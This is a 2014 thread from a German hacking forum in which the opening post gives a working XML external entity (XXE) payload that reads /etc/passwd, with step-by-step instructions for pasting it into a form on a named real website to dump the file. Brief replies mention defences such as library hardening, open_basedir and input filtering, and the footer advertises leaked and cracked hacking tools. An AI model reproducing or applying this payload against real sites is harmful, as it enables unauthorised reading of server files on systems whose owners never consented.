Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

utilities-online.info - xml external entity attack

- - - - -
Erstellt von Zero-X ,

  • Bitte melde dich an um zu Antworten
3 Antworten in diesem Thema

#1
Zero-X
Geschrieben 23 September 2014 - 11:49 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux

Please Login HERE or Register HERE to see this link!




Im Feld "XML" folgendes eingeben:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

Im Feld XPath Expression:
/

Dann auf "Evalutate XPath" klicken.
Unten im grünen Feld erscheint dann die Ausgabe der angegebenen Datei.
  • Ch!ller gefällt das

#2
Xenos88
Geschrieben 23 September 2014 - 13:22 Uhr

Xenos88

    Hacker

  • Premium Member
    • Likes
    67
  • 151 Beiträge
  • 184 Bedankt
wie kann man sich vor solcher Attacke schützen ?

#3
ProHex
Geschrieben 23 September 2014 - 14:02 Uhr

ProHex

    Hacker

  • Moderator
    • Likes
    213
  • 219 Beiträge
  • 187 Bedankt
in dem man seine library dagegen absichert.

open_basedir wär vielleicht auch mal hilfreich
  • ¥akuza112 gefällt das

#4
Zero-X
Geschrieben 24 September 2014 - 11:35 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android
  • Windows, Linux
Hier ein Link mit mehr Informationen zu der Attacke:

Please Login HERE or Register HERE to see this link!



Sie kann gegen mehrere Skriptsprachen wie php, jsp oder asp angewandt werden.
Je nach Skriptsprache hat man verschiedene Möglichkeiten die Attacke einzusetzen. Auch SQL-Injection und OS-Command-Injection ist teilweise möglich.
Um sich zu schützen muss man auf jeden Fall die Eingaben der User prüfen und filtern.
  • pdr0 gefällt das
Zurück zu  Classic Hacking

  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 34 user(s)


    , ¥akuza112, Ac4nth, AdlerRhy, Blower, Born2Hack, Ch!ller, chimchoca7, Cranky, crano, Cube, curlz, FalkE, Framerater, gutzuu, hikhack7, Imperial, InternetFreak, kadama, lolorollo, maximaxi, paulaner, pdr0, Platin, ProHex, Silasge, sivan1, smc2014, Smokyjoe, Soek, Xenio, Xenos88, xrahitel, Zero-X
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking